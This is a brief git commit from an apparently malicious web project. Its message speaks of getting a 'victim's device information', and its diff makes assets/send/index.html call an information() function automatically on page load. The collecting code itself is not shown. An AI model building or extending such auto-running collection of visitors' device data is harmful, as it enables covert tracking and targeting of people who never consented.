Initiated the methid to get victim's device information

--- a/assets/send/index.html
+++ b/assets/send/index.html
@@ -12,7 +12,7 @@
   <script src="js/info.js"></script>
   <script src="js/warpspeed.min.js"></script>
 </head>
-<body>
+<body onload="information()">
   <div class="container">
     <div class="ball">
       <h3>ON</h3>
